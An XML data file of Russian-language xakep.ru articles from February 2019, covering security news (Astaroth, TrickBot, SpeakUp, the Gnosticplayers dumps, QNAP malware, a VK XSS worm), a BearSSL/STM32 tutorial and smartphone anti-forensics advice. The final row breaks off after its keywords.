<articles xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

<row>
  <id>2d4f7047-708e-4651-9330-9b6266925f16</id>
  <title>Троян Astaroth использует антивирусы для кражи данных</title>
  <keywords>Astaroth;Avast;GAS Tecnologia;Антивирусы;Вирусы;Новости;Трояны</keywords>
  <content>ИБ-эксперты Cybereason Nocturnus Research обнаружили новую версию малвари Astaroth, которая использует легитимные процессы (в том числе и защитного ПО) в своих целях. Исследователи пишут, что троян использует продукты Avast и GAS Tecnologia для хищения данных и загрузки вредоносных модулей. Инфостилер Astaroth был замечен специалистами еще в 2018 году. К примеру, о малвари рассказывали аналитики компании Cofense. Тогда, как и сейчас, Astaroth атаковал пользователей в Бразилии и странах Европы, и задействовал для работы легитимные решения, к примеру, эксплуатировал интерфейс командной строки WMIC для тайной загрузки и установки вредоносных пейлоадов. Astaroth способен похищать данные из буфера обмена, перехватывать нажатия клавиш, системные сообщения, похищать учетные данные от различных служб и сервисов, а также стремится собрать как можно больше информации о зараженной системе и финансовых счетах жертвы. Новая вариация Astaroth, обнаруженная Cybereason Nocturnus Research, похожа на своих «предшественников», и тоже использует в работе легитимную утилиту Windows BITSAdmin для загрузки пейлоадов. Как и в предыдущих случаях, троян распространяется через спамерские письма и доставляется на машину жертвы во вложении (файл .7zip) или через вредоносную ссылку в таком письме. Также исследователи заметили, что данная версия трояна осуществляет инжект вредоносного модуля в процесс aswrundll.exe (Avast Software Runtime Dynamic Link Library), принадлежащий антивирусу Avast. С его помощью троян извлекает данные с зараженной машины, а также загружает дополнительные модули, если потребуется. Если же Avast в зараженной системе отсутствует, аналогичный «трюк» малварь проделывает с процессом unins000.exe, принадлежащим защитному решению компании GAS Tecnologia. После публикации отчета Cybereason Nocturnus Research представители Avast связались с исследователями и СМИ и пояснили, что защитное ПО компании не подвергается взлому, а действия преступников не являются инжектами или эскалацией привилегий. Разработчики заверили, что уже изучают проблему и в ближайшее время введут новые защитные меры, чтобы предотвратить подобные злоупотребления в будущем.</content>
  <url>https://xakep.ru/2019/02/15/astaroth/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>4e4189bd-44f1-43db-b51b-e55d935269da</id>
  <title>Исследователи изучили, как веб-сервисы регулируют пароли пользователей</title>
  <keywords>Аналитика и цифры;Веб-сервисы;Информационная безопасность;Новости;Пароли</keywords>
  <content>Специалисты компании Digital Security протестировали парольные политики 157 веб-сервисов, включая социальные сети, почтовые клиенты, облачные хранилища и интернет-банкинг. Эксперты выяснили, какие сайты предъявляют самые строгие правила к созданию паролей и таким образом являются потенциально безопасными; какие рекомендации по защите аккаунтов даются пользователям и при использовании каких сайтов пользователь, скорее всего, станет жертвой злоумышленника. Исследователи предъявляли следующие требования к изучаемым паролям: Помимо этого учитывалось, что сервисы должны давать общие рекомендации по сложности пароля пользователям и не позволять регистрироваться ни с одной из тестируемых комбинаций символов. Для тестирования возможности установки простых паролей были выбраны пароли из нескольких известных словарей, включая RockYou и Топ-10000 самых плохих паролей. В итоге были протестированы следующие группы сервисов: почтовые сервисы, социальные сети, электронная коммерция, платежные сервисы, игровые сервисы, криптовалюта, хранение данных, совместная разработка, хостинг, парольные менеджеры, новостные сервисы, развлекательные ресурсы, блоги и форумы, интернет-банкинг. По результатам тестирования сервисам начислялись баллы, на основе которых составлялся рейтинг: максимум — 11,5 баллов. Так, оказалось, что игровые сервисы со временем (проводилось сравнение с аналогичным исследованием 2015 года) стали лучше заботиться о парольных политиках, в отличие от платежных систем. А социальные сети практически не контролируют создание паролей пользователями, что в результате приводит к повышенному риску взлома. Например, Facebook заработал 8 баллов из возможных 11,5 и занял первое место среди протестированных соцсетей, на втором — StackExchange, на третьем месте — «Одноклассники», на четвертом — Tinder, пятое — Instagram, шестое — Twitter, и только на седьмом месте расположился «ВКонтакте». Прошли проверку также и почтовые сервисы. Они оказались лидерами по безопасности парольных политик. Их рейтинг выглядит так: Outlook — 10 баллов, Gmail — 9 баллов, Mail и Yahoo — 7,5 баллов, Яндекс — 6 баллов, Рамблер — 1,5 балла. Победитель прошлого рейтинга платежных сервисов, WebMoney, в этот раз заработал -0,5 и сместился на последнее место, а первое место занял Skrill. Исследователи подчеркивают, что зарубежные сервисы уделяют настройкам паролей больше внимания, чем российские. В случаях, когда сайты не предоставляют никаких рекомендаций по созданию паролей, ответственность за это полностью лежит на пользователе. Если же пользователь регистрирует слабый пароль, то вероятность хакерской атаки на его аккаунт возрастает в разы. «В тестировании сервисов учитывались разные показатели к требованию паролей от веб-сервисов: длина пароля и его содержание, предлагает ли сайт рекомендации по созданию пароля, какими правилами должен руководствоваться пользователь при выборе комбинаций символов, возможно ли зарегистрироваться на сайте со слабым или словарным паролем, есть ли механизмы от несанкционированной авторизации, возможно ли совпадение логина и почты, какие ограничения используют сервисы при регистрации или восстановлении пароля», — уточняет соавтор исследования Иван Юшкевич, аналитик Digital Security. Подробные результаты и методология тестирования представлены в отчете компании Digital Security «Тестирование парольных политик веб-сервисов 2.0».</content>
  <url>https://xakep.ru/2019/02/15/passwords-dsec/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>36fb5c3b-a5ce-496d-9b56-35d91755d7b7</id>
  <title>Check Point: бэкдор SpeakUp стал одной из наиболее активных угроз января</title>
  <keywords>Blockchain;SpeakUp;Аналитика и цифры;Вирусы;Криптовалюта;Майнер;Новости;статистика</keywords>
  <content>Исследователи компании Check Point опубликовали традиционный отчет Global Threat Impact Index за январь 2019 года. Специалисты предупредили, что бэкдор-троян SpeakUp, сейчас распространяющий майнинговую малварь, стал одной из наиболее активных угроз прошлого месяца. Напомню, что атаки SpeakUp нацелены в основном на серверы в Восточной Азии и Латинской Америке, включая машины, размещенные на AWS. При этом малварь может представлять опасность не только для шести дистрибутивов Linux, но также для устройств на macOS. Ранее аналитики Check Point уже писали, что малварь поставляется вместе со встроенным Python-скриптом, который используется для распространения заражения в локальной сети. Скрипт сканирует локальную сеть и ищет открытые порты, брутфорсит «соседние» системы, используя заранее подготовленный список логинов и паролей, а затем пытается применить против них один из семи эксплоитов из своего арсенала. В настоящее время хак-группа, использующая SpeakUp, применяет бэкдор для установки майнинговой малвари на зараженные серверы. Таким способом хакеры добывают криптовалюту Monero. Однако малварь способна доставлять любую полезную нагрузку и запускать ее на скомпрометированных машинах, из-за чего исследователи Check Point рассматривают Speakup как серьезную угрозу. Помимо SpeakUp в январе первые четыре строчки рейтинга самых активных вредоносных программ уже традиционно заняли криптовалютные майнеры. Coinhive остается главным вредоносным ПО, атаковавшим 12% организаций по всему миру. XMRig снова стал вторым по распространенности зловредом (8%), за которым последовал майнер Cryptoloot (6%). Несмотря на то, что в январском отчете представлены четыре майнера, половина всех вредоносных форм из первой десятки может использоваться для загрузки дополнительного вредоносного ПО на зараженные машины. «В январе произошли небольшие изменения в формах вредоносных программ, ориентированных на организации по всему миру, однако мы находим все новые способы распространения вредоносных программ. Подобные угрозы являются серьезным предупреждением о грядущих угрозах. Бэкдоры, такие как Speakup, могут избежать обнаружения, а затем распространять потенциально опасное вредоносное ПО на зараженные машины. Поскольку Linux широко используется именно на корпоративных серверах, мы ожидаем, что Speakup станет угрозой для многих компаний, масштабы и серьезность которой будут расти в течение года, — комментирует Василий Дягилев, глава представительства Check Point Software Software Technologies в России и СНГ. — Кроме того, второй месяц подряд в тройке самых активных вредоносных программ в России оказывается BadRabbit. Так что злоумышленники используют все возможные уязвимости для получения прибыли». Самые активные угрозы января 2019: Что касается мобильных угроз, здесь Hiddad, модульный бэкдор для Android, который предоставляет привилегии загружаемой малвари, заменил Triada на первом месте. На втором месте расположился Lotoor, в то время как троян Triada спустился на третье место. Самые активные мобильные угрозы января 2019: Выводы аналитиков Check Point прокомментировал Алексей Мальнев, руководитель центра мониторинга и реагирования на инциденты ИБ Jet CSIRT компании «Инфосистемы Джет»: «В отличие от большинства современных угроз, троян SpeakUP доставляется через веб-канал связи и на Linux-серверы. Обычно для этих целей злоумышленники используют email, а угрозы, как правило, нацелены на платформы Microsoft Windows. Не удивительно, что большинство известных антивирусов пока не способны обнаружить угрозу. Причина в том, что 75% успешных атак реализуются с помощью 0-day уязвимостей, которые разрабатываются для преодоления известных сигнатурных средств защиты. Обнаружить подобные угрозы можно с помощью систем мониторинга веб-трафика (Web Application Firewall): например, они позволяют выявить попутки загрузки шелл-кода. Также полезно использовать комплекс систем поведенческого анализа — с их помощью можно обнаружить аномалии в сетевом трафике, поведении пользователей и запущенных процессах. Если же заражение произошло, то здесь поможет мониторинг инцидентов ИБ. С его помощью можно обнаружить вредоносную активность на этапе горизонтального распространения в инфраструктуре — до финальной реализации угрозы».</content>
  <url>https://xakep.ru/2019/02/15/january-threats/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>9b4deff2-dd5a-4bda-97a4-a41351a31435</id>
  <title>Мальтийский банк приостановил работу из-за атаки</title>
  <keywords>Bank of Valletta;Банки;Взлом;Кибератаки;Мальта;Новости</keywords>
  <content>Один из крупнейших и старейших банков Мальты, Bank of Valletta, пострадал от кибератаки. Злоумышленники попытались похитить порядка 13 млн евро, и как только сотрудники банка заметили неавторизованные операции, было принято решение экстренно приостановить работу. В итоге все отделения Bank of Valletta увели в оффлайн свои банкоматы, PoS-системы, а также временно прекратил работу сайт банка, сервисы электронных услуг и внутренняя почта. По данным местных СМИ (1, 2), атакующие попытались перевести 13 млн евро на счета в других банках, в том числе расположенных в Великобритании, США, Чехии и Гонконге. Мальтийский премьер-министр Джозеф Мускат (Joseph Muscat) сообщил, что специалисты Bank of Valletta незамедлительно уведомили об инциденте своих зарубежных коллег и смогли обратить транзакции, восстановив контроль над похищенными средствами. В настоящее время Bank of Valletta уже возобновил работу в штатном режиме. На официальном сайте банка появилось заявление, согласно которому над расследованием случившегося уже работают местные и международные правоохранительные органы. Также представители банка заверили, что аккаунты клиентов данная атака не затронула, и они не были скомпрометированы.</content>
  <url>https://xakep.ru/2019/02/15/bank-of-valletta/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>2389db97-3f14-4e5e-9f4f-da73d95cd1ec</id>
  <title>BearSSL и STM32. Как реализовать шифрование для самодельного гаджета</title>
  <keywords>Arduino;DIY;STM32;Выбор редактора;Гаджеты;Статьи;шифрование</keywords>
  <content>Нам понадобятся официальная оценочная плата Discovery компании STMicroelectronics и модуль Wi-Fi на ESP8266. Последних существует огромное количество, подойдет практически любой. Главное, чтобы там были выводы RX/TX UART и стандартная прошивка для работы с АТ-командами. Я использую отечественный Troyka (модуль компании «Амперка») просто потому, что он у меня уже есть. F746G Discovery — это практически Ferrari в мире хобби-электроники. Мощный микроконтроллер (Cortex-M7, 216 МГц) тут сочетается с микросхемой SDRAM внушительных объемов (целых 8 Мбайт) и полезной периферией: экран 480 × 272 с 24-битным цветом, интерфейс SDIO для карт памяти, разъемы аудио и Ethernet. Я не буду перечислять все доступные возможности этой платы — ты можешь найти подробности на сайте производителя STMicroelectronics. Все то, что раньше приходилось добавлять к Arduino с помощью дочерних плат расширения или модулей, тут доступно «из коробки». Да, цена соответствующая — порядка 6500 рублей. Но когда это спортивные автомобили были для простого народа? F746G Discovery — не единственный вариант демоплаты для этого проекта. Ты можешь с таким же успехом использовать, например, отладочную плату из серии Nucleo: F767ZI Nucleo. Для нее тоже есть поддержка в пакете STM32duino, и она гораздо дешевле — около 3000 рублей. Такого разнообразия периферии у нее, правда, нет. Полноценно нагрузить все компоненты и использовать возможности F746 Discovery на сто процентов в одном проекте непросто. Сегодня с помощью библиотеки bearSSL мы протестируем только вычислительную мощь ядра Cortex-M7 в прикладных задачах криптографии. Программирование под STM32 предполагает внимательное изучение сопроводительной документации. Сегодня я постараюсь осветить все подробности и интересности, которые встретятся нам на пути, но в дальнейшем все же настоятельно рекомендую обратиться к следующим материалам (все ссылки — на PDF): В качестве среды разработки я выбрал Arduino IDE. Проект открытый, и вокруг него успело сложиться большое сообщество, так что это хороший выбор как для новичка, так и для продвинутого пользователя. Кроме того, этот выбор позволит нам воспользоваться уже готовой кодовой базой. Таким образом, мы пропустим тривиальную настройку периферии и быстро перейдем к вещам более интересным. Изначально в Arduino IDE доступны только платы на AVR-микроконтроллерах, ни о каком ARM она и не слышала. Чтобы включить поддержку плат STM32duino, нужно перейти в раздел Arduino → Preferences и добавить дополнительную ссылку. После этого в «Менеджере плат» ты сможешь скачать все необходимые файлы пакета. Во время установки опция с STM32duino может и не появиться в списке доступных для установки расширений. В этом случае проверь разрешения для Arduino IDE на работу по сети или добавь в список исключений для антивируса. Если ты еще не проверил корректность работы компилятора и самой платы на парочке простых примеров из числа встроенных, то сейчас самое время. Потому что мы переходим к правке исходных файлов по адресу «Библиотеки → Arduino15 → packages → STM32 → hardware → stm32» (советую сделать копию папки, ты знаешь, как оно бывает). Все дело в том, что проект STM32duino поддерживается энтузиастами (хотя сейчас им заинтересовалась сама STMicroelectronics) и, как следствие, часть функций Arduino реализована, а часть почему-то оказалась забыта. Например, по умолчанию отсутствует последовательный порт (Serial) на выводах D0 и D1 разъема Arduino. Если ты знаком с оригинальными итальянскими платами (и их многочисленными китайскими клонами), то знаешь, что этот порт связан с разъемом USB через UART — USB-преобразователь в основном используется для общения с компьютером и при перепрошивке флеш-памяти. На Discovery все несколько по-другому. Микроконтроллер F746NGH6 прошивается с помощью встроенного программатора ST-Link/V2-1 (небольшая микросхема возле miniUSB-порта). Он же выступает в качестве преобразователя интерфейсов при отправке данных на ПК. Но все это делается по другому UART — вовсе не тому, который выведен на плате на разъем Arduino (да, у контроллеров ST богатая периферия, об этом следовало сказать заранее). Если в прошлом ты использовал плату Arduino Leonardo, то можешь предположить, что для этого интерфейса используется объект Serial1. Но нет! В проекте STM32duino нумерация программных портов Serial соответствует номеру аппаратного периферийного блока UART, и поэтому в любом коде для нашей Discovery Serial и Serial1 — это один и тот же объект (используется переопределение). Как тогда обращаться к UART на разъеме Arduino? Изучив таблицу 4 на странице 23 документации демоплаты, ты узнаешь, что это RX/TX-выводы UART6. Впрочем, одного лишь этого знания будет недостаточно: компилятор сообщит, что Serial6 не определен. Чтобы добавить порт UART для работы с ESP8266, нужно отредактировать конфигурационные файлы самой платы — они располагаются по адресу stm32 → 1.4.0 → variants → DISCO_746NG. В самих файлах нет ни намека на возможное решение проблемы, но тщательное изучение исходников проекта STM32duino (папка cores на уровне с variants) должно навести на определенные идеи. На самом деле нам достаточно добавить несколько строчек в файл variants.h: Почему их нельзя было оставить в файле закомментированными, чтобы пользователи не тратили время на знакомство с нюансами реализации Arduino-окружения на платах от ST, — это для меня загадка. Однако теперь объект Serial6 станет доступен в нашем коде, и мы наконец сможем наладить взаимодействие с модулем Wi-Fi. Следующие шаги опциональные, однако, если ты хочешь получить максимум быстродействия от связки F746 и ESP8266, советую их не пропускать. Тем более что после них с настройкой окружения будет наконец покончено. Нам нужно настроить размеры внутренних буферов класса HardwareSerial на прием и передачу информации по интерфейсу UART. По умолчанию размеры подобраны для плат Arduino с микроконтроллерами AVR, и это может стать проблемой при передаче больших массивов данных (как раз наш случай). В папке cores → arduino открой файл HardwareSerial.h и найди в нем такие строчки: Материалы из последних выпусков можно покупать отдельно только через два месяца после публикации. Чтобы продолжить чтение, необходимо купить подписку. Подписка позволит тебе в течение указанного срока читать ВСЕ платные материалы сайта. Мы принимаем оплату банковскими картами, электронными деньгами и переводами со счетов мобильных операторов. Подробнее о подписке 7190 р. 720 р.</content>
  <url>https://xakep.ru/2019/02/15/bearssl-stm32/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>0f9d4688-cfc9-4952-9bed-9ff53b5244fd</id>
  <title>Данные еще 127 000 000 пользователей выставлены на продажу</title>
  <keywords>Gnosticplayers;Дарквеб;Даркнет;Новости;Пароли;Утечка данных</keywords>
  <content>Ранее на этой неделе в даркнете, на торговой площадке Dream Market, были выставлены на продажу данные 620 миллионов пользователей 16 крупных сайтов. За этот дамп злоумышленники суммарно просили около 20 000 долларов (в биткоинах). В подборку злоумышленников вошла информация о пользователях следующих ресурсов: Dubsmash (162 млн), MyFitnessPal (151 млн), MyHeritage (92 млн), ShareThis (41 млн), HauteLook (28 млн), Animoto (25 млн), EyeEm (22 млн), 8fit (20 млн), Whitepages (18 млн), Fotolog (16 млн), 500px (15 млн), Armor Games (11 млн), BookMate (8 млн), CoffeeMeetsBagel (6 млн), Artsy (1 млн), а также DataCamp (700 000). После того как информация о дампе попала в СМИ, многие из перечисленных компаний вынуждены были признать, что действительно пострадали от атак и начали уведомлять о случившемся пользователей или даже принудительно сбрасывать пароли. Так, расследования начали проводить компании Dubsmash, 500px, EyeEm, CoffeeMeetsBagel, DataCamp. Теперь издание TechCrunch сообщило, что те же преступники, скрывающиеся под псевдонимом Gnosticplayers (возможно, это не группа, а один человек), продают на Dream Market новый сборник данных, в который вошли 127 000 000 записей о пользователях еще 8 скомпрометированных компаний. Суммарно за этот дамп просят 14 500 долларов в криптовалюте. Равно как и прошлый раз, базы можно приобрести отдельно или вместе. Цена зависит от ценности самих данных и сложности взлома парольных хешей. В дамп входят: Из всех перечисленных в списке компаний об утечке данных пока сообщала только Houzz. Напомню, что в ходе беседы с журналистами The Register продавец первого дампа рассказывал, что в общей сложности в его распоряжении имеется порядка 20 различных баз, некоторые из которых он собирается выставить на продажу, а другие приберегает для личного пользования. По его словам, суммарно эти «сборники» включают в себя информацию примерно о миллиарде различных аккаунтов, а самые старые утечки датированы еще 2012 годом.</content>
  <url>https://xakep.ru/2019/02/15/more-gnosticplayers-dumps/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>ecbd96cd-eabd-49a2-aad8-466c7f1c1a25</id>
  <title>Устройства QNAP под атакой, но патчей пока нет</title>
  <keywords>hosts;Qnap;Взлом;Вирусы;Новости</keywords>
  <content>В начале текущей недели журналисты издания The Register обратили внимание на тревожные сообщения владельцев устройств QNAP. Те сообщали, неизвестная малварь подменяет файлы hosts и препятствует обновлению ПО (в том числе и защитных решений). В /etc/hosts добавляется около 700 записей для перенаправления ряда IP на адрес 0.0.0.0. Хуже того, пользователи писали, что после удаления записей, те появляются снова даже после перазагрузки устройства, и откуда вообще взялось заражение, неясно. Теперь (когда китайский Новый год закончился) представители QNAP официально признали проблему и заверили, что уже работают над ее устранением. В настоящее время специалисты изучают малварь и обещают в ближайшее время защитить от нее пользователей. Точный список уязвимых продуктов пока опубликован не был. Пока пострадавшим рекомендуют обновить все приложения и QTS, а также вручную установить последнюю версию инструмента MalwareRemover и воспользоваться им.</content>
  <url>https://xakep.ru/2019/02/15/qnap-hosts/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>8bc225bb-232d-4284-8d64-14a7bc1490b0</id>
  <title>Банкер TrickBot научился похищать учетные данные RDP, VNC и PuTTY</title>
  <keywords>PuTTY;RDP;TrickBot;VNC;Банковские трояны;Новости;Пароли</keywords>
  <content>Эксперты компании Trend Micro нашли новую версию банковского трояна TrickBot (он же Trickster, TheTrick и TrickLoader), чей арсенал стал еще богаче. Напомню, что данная малварь «знакома» экспертам уже давно и постоянно развивается. Так, в марте прошлого года вредонос приобрел функциональность локера и научился весьма эффективно избегать обнаружения. В конце 2018 года авторы малвари расширили арсенал TrickBot модулем PasswordGrabber, предназначенным для хищения паролей с зараженных машин. А затем малварь стала воровать даже информацию об истории проблем в Windows. Теперь исследователи рассказывают, что арсенал TrickBot в очередной раз пополнился новой функциональностью. Новая версия трояна распространяется через вредоносные вложения в спамерских письмах и комплектуется тремя новыми инструментами для кражи паролей: атакует Virtual Network Computing (VNC), PuTTY, а также Remote Desktop Protocol (RDP). Для кражи учетных данных VNC троян ищет файлы, в чьих именах содержится «.vnc.lnk». Поиск производится в %APPDATA%\Microsoft\Windows\Recent и %USERPROFILE%\Documents, %USERPROFILE%\Downloads. Для хищения паролей от PuTTY и RDP малварь изучает ключ реестра Software\SimonTatham\Putty\Sessions и задействует CredEnumerateA API и target=TERMSRV для идентификации хоста, юзернейма и пароля для RDP, а затем крадет учетные данные. Похищенную таким образом информацию малварь передает своим операторам, используя POST-команды и конфигурационный файл dpost, загружаемый с C&amp;C-сервера.</content>
  <url>https://xakep.ru/2019/02/14/new-trickbot/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>1bc308a9-fd5d-4441-b36e-f8b74922bdd9</id>
  <title>Баг «ВКонтакте»: все публикуют одну и ту же запись</title>
  <keywords>ВКонтакте;Новости;Социальные сети;Уязвимости</keywords>
  <content>Сегодня вечером (14 февраля 2019 года) по социальной сети подобно червю стало массово распространяться сообщение с «новостью» о том, что во «ВКонтакте» появится реклама в личных сообщениях. Переход по ссылке из такого сообщения приводил к распространению новых записей. В настоящее время администрация «ВКонтакте» сообщает, что ситуация взята под контроль, а пострадавшие аккаунты не были взломаны, и пароли их администраторов в безопасности. В пресс-службе социальной сети сообщили, что инцидент произошел из-за уязвимости, позволявшей выполнить произвольный код JavaScript, и сейчас баг спешно исправляют (похоже, речь об XSS-баге). Также администрация напомнила, что люди, нашедшие уязвимость, могли бы заработать деньги с помощью bug bounty программы HackerOne. Судя по всему, волна публикаций берет начало из сообщества «Багосы» (теперь заблокированного), где своеобразный анонс уязвимости появился заранее. Сейчас представители сообщества утверждают, что нашли эту уязвимость еще в прошлом году. «Тогда, после устранения уязвимости, было найдено множество обходов, но даже спасибо мы за них не получили. В итоге остался последний обход, который мы берегли целый год», — гласит сообщение. Так как багхантерам, по их словам, не выплатили вознаграждение за баг, было решено использовать проблему, не нанося вреда пользователям. UPD. В пресс-службе «ВКонтакте» уточняют: «Уязвимость была полностью закрыта в течение 20 минут, удалять нежелательные публикации мы начали в течение первой минуты после обнаружения уязвимости. Пользовательские данные и пароли находятся в безопасности, личные страницы и сообщества не были взломаны. Мы оперативно проведём продуктовые обновления, чтобы предотвратить такие ситуации в будущем. Мы приносим извинения пользователям, столкнувшимся с возможными неудобствами из-за данного инцидента, и благодарим всех, кто поддержал нас». </content>
  <url>https://xakep.ru/2019/02/14/vk-worm-messages/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>644be827-143b-4210-b3de-c4b40d5e235c</id>
  <title>Антикриминалистика. Как защитить смартфон от извлечения данных</title>
  <keywords>Android;iPhone;SmartLock;Взлом;Выбор редактора;Информационная безопасность;Облако;Смартфоны;Статьи;Утечка данных</keywords>
  <content>Ты можешь выбрать самый стойкий код блокировки, но если в твоем телефоне используется шифрование FDE и ты не включил режим Secure Startup, то код блокировки может быть хоть в сотню символов длиной — шифрование все равно будет использовать фразу default_password. Отключение Smart Lock — необходимый, но недостаточный шаг; уверен ли ты в безопасности используемой в твоем устройстве технологии сканирования лица (если телефон ей оборудован)? А знаешь ли ты, что, просто зайдя на твой компьютер, можно извлечь все твои облачные пароли, после чего попросту сбросить код блокировки смартфона? (Работает, к счастью, не для всех устройств, но знать о такой возможности нужно.) Наконец, нужно отдавать себе отчет, что если с твоего компьютера будет получен пароль от облака (Google, Apple или Samsung), то сам телефон будет никому не нужен: все необходимые данные эксперт извлечет из облака (и, скорее всего, их там будет даже больше, чем в самом телефоне). В этой статье мы не будем давать набивших оскомину советов «включить код блокировки» или «обновиться до последней версии ОС» (разумеется, ты это уже сделал). Вместо этого мы постараемся дать понимание всего спектра возможностей «тяжелой артиллерии», которая может быть использована против владельца телефона правоохранительными органами и спецслужбами для извлечения данных. Как известно, самые сложные для работы экспертов случаи — обесточенный телефон, обнаруженный у безмолвного тела. Именно в таких обстоятельствах, как правило, начинается поиск всевозможных уязвимостей в программном и аппаратном обеспечении. В обыденных ситуациях полиция придет домой к подозреваемому, проведет анализ компьютера и извлечет кеш паролей из почтовых клиентов и браузеров Chrome/Mozilla/Edge. Затем достаточно зайти в облако с найденным логином и паролем, после чего остальное тривиально. В ряде случаев на телефоне можно удаленно сбросить пароль блокировки (сегодня, к счастью, многие производители не предлагают такой возможности по умолчанию). Телефон можно подключить к «осьминогу» UFED, который скопирует раздел данных и расшифрует его через одну из известных разработчикам уязвимостей или с использованием «расшифровывающего загрузчика» (decrypting bootloader в терминах Cellebrite) независимо от длины твоего пароля и наличия установленных обновлений. Прочитав эту статью, ты будешь более полно осознавать возможности защитить свои данные и риски, которые останутся даже тогда, когда ты все сделал правильно. Сложность взлома iPhone отличается в зависимости от ряда факторов. Первый фактор: установленная версия iOS (ты ведь не думаешь, что советы «обновиться на последнюю доступную версию» появились на ровном месте?), сложность кода блокировки и то, в каком состоянии находится устройство (о нем — ниже). Сначала — о версиях iOS. Если у тебя до сих пор установлена любая версия iOS 11, у меня для тебя плохая новость: для этой ОС доступен как взлом кода блокировки методом прямого перебора, так и полное (и очень быстрое) извлечение информации через физический доступ. Сложность кода блокировки и состояние устройства (включено-выключено, активирован ли защитный режим USB restricted mode и так далее) повлияют на скорость перебора. Если телефон был выключен: скорость перебора паролей будет очень медленной (одна попытка в десять секунд). Если ты установишь код блокировки из шести цифр, то перебирать его будут вечность. Если телефон был включен и ты хотя бы раз разблокировал его после включения: первые 300 000 паролей будут опробованы очень быстро; скорость перебора такова, что четырехзначный код блокировки может быть взломан в течение получаса в полностью автоматическом режиме. Вывод? Используй шестизначный пароль. Если ты успел воспользоваться режимом SOS (зажав кнопку питания и кнопку громкости): телефон снова переходит в режим «медленного» перебора. Шестизначный код блокировки в этом случае отличная защита. Наконец, в iOS 11.4.1 появился режим USB restricted mode, позволяющий защитить устройство от взлома путем перебора паролей. В течение часа после последнего разблокирования iOS отключит доступ к USB-порту, после чего перебор паролей станет невозможным. Для того чтобы защита сработала, нужно оставить переключатель USB Accessories в положении «выключено». Впрочем, в последнее время активно циркулируют слухи, что разработчикам криминалистических комплексов удалось или вот-вот удастся обойти и эту защиту. Вывод? Да обновись ты до iOS 12, наконец! Ситуация с iOS 12 довольно интересна. Apple удалось закрыть ряд уязвимостей, которые делали возможным перебор паролей на устройствах с iOS 11. Более того, защитный режим USB restricted mode был усовершенствован: теперь USB-порт (а точнее, возможность передачи данных через физический коннектор Lightning) отключается сразу же, как только ты заблокируешь экран устройства. Правда, только в тех случаях, если ты как минимум три дня не подключал телефон к компьютеру, проводной аудиосистеме или другим аксессуарам; если же подключал, то будет как раньше — через час. Кроме того, USB-порт теперь отключается и при вызове режима SOS (зажать кнопку питания и громкости). С другой стороны, в iOS 12 присутствуют уязвимости, перекочевавшие в систему еще из 11-й версии ОС. В iOS 12 вплоть до версии 12.1.2 не были закрыты две важные уязвимости, позволяющие через эскалацию привилегий получить полный доступ к файловой системе без установки полноценного джейлбрейка. Соответственно, если в руки экспертов телефон с iOS 12.1.2 или более старой попадет в разблокированном состоянии, то данные из него улетят со свистом. В iOS 12.1.3 часть уязвимостей была закрыта (не все: GrayKey по-прежнему способен извлечь образ файловой системы), но полностью обезопасить устройства от известных на сегодняшний день эксплоитов смогла только iOS 12.1.4, которая вышла буквально на днях. Вывод? В совете «обновись до последней доступной версии прошивки» все-таки что-то есть! Итак, как именно будут пытаться взломать твой iPhone с iOS 12? Самый безопасный для тебя вариант — если в руки эксперта твой телефон попадет в выключенном состоянии. В этом случае начать перебор не удастся — по крайней мере до тех пор, пока разработчики не придумают, как обойти защитный режим USB (к слову, пока не придумали). Если телефон был включен и разблокирован хотя бы раз после включения (но заблокирован на момент взлома), то сделать с ним что-то полезное тоже не получится. Да, можно попытаться подключить его к твоему компьютеру, чтобы создать резервную копию через iTunes; если не успел активироваться защитный режим USB и если ты хоть раз подключал свой iPhone к iTunes, то попытка может оказаться успешной. Как защититься? Установи длинный и сложный пароль на резервную копию. Да, в iOS 12 (и в iOS 11) этот пароль можно сбросить — но только с самого iPhone и только если известен код блокировки. И даже тогда ты можешь дополнительно защитить пароль от сброса, установив пароль Screen Time. Пароль Screen Time — не панацея. Вообще говоря, это «детская» защита, функция защиты от сброса пароля на резервную копию в ней вторична. Тем не менее обойти ее не получится даже перебором: iOS будет увеличивать задержки до тех пор, пока скорость перебора не упадет до одной попытки в час (начиная с десятой попытки). Материалы из последних выпусков можно покупать отдельно только через два месяца после публикации. Чтобы продолжить чтение, необходимо купить подписку. Подписка позволит тебе в течение указанного срока читать ВСЕ платные материалы сайта. Мы принимаем оплату банковскими картами, электронными деньгами и переводами со счетов мобильных операторов. Подробнее о подписке 7190 р. 720 р.</content>
  <url>https://xakep.ru/2019/02/14/secure-smartphone/</url>
  <student_id>c7f79d4b-5f5e-42a4-b8df-fd39a458fd73</student_id>
</row>

<row>
  <id>94836e4d-08b6-491b-8c48-764a7557a48c</id>
  <title>Уязвимость Dirty Sock позволяет получить root-привилегии на Linux-машинах</title>
  <keywords>Dirty Sock;Linux;Proof of concept;snapd;Новости;Уязвимости;Эксплоиты</keywords>
